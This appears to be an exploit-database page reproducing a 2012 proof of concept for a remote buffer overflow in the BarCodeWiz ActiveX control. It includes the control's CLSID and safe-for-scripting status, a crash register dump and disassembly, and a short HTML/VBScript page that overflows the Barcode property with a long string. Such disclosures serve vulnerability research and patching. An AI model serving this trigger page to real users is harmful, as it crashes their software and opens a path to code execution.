BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote Buffer Overflow PoC

2012.07.27
Credit: coolkaveh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

Exploit Title: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote Buffer Overflow PoC Date: July 25, 2012 Author: coolkaveh coolkaveh () rocketmail com Https://twitter.com/coolkaveh Vendor Homepage: http://barcodewiz.com/ Version: 4.0.0.0 Tested on: windows 7 SP2 awesome coolkaveh ======== Class BarCodeWiz GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6} Number of Interfaces: 1 Default Interface: IWiz RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data -------------------------------------------------------------------------- Registers: -------------------------------------------------------------------------- EIP 023F8D42 EAX 00000021 EBX 00000ADD ECX 025A2F58 -> 02439F8C EDX 00000001 EDI 0046D48C -> 00000068 ESI 025A2F58 -> 02439F8C EBP 0046D47C -> 0046E48C ESP 0046D464 -> 025A0AA8 Block Disassembly: ---------------------------------------------------------------------------- 23F8D33 INC EBX 23F8D34 MOV [EBP+8],ECX 23F8D37 PUSH ECX 23F8D38 PUSH DWORD PTR [EBP-8] 23F8D3B MOV ECX,ESI 23F8D3D CALL 023F837E 23F8D42 MOV [EDI+EBX*4],EAX <--- CRASH 23F8D45 INC EBX 23F8D46 DEC DWORD PTR [EBP-4] 23F8D49 MOV EAX,[EBP-4] 23F8D4C CMP EAX,[EBP-C] 23F8D4F JL 023F8C80 23F8D55 JMP 023F8ECE 23F8D5A MOV EAX,[ESI] 23F8D5C PUSH EBX ArgDump: -------------------------------------------------- EBP+8 00000006 EBP+12 025A2F58 -> 02439F8C EBP+16 00000068 EBP+20 00000021 EBP+24 00000021 EBP+28 00000021 ============================================================================ <html> Exploit <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object> <script language='vbscript'> targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll" prototype = "Property Let Barcode As String" memberName = "Barcode" progid = "BARCODEWIZLib.BarCodeWiz" argCount = 1 arg1=String(14356, "A") poc.Barcode = arg1 </script>

References:

https://twitter.com/coolkaveh
http://barcodewiz.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top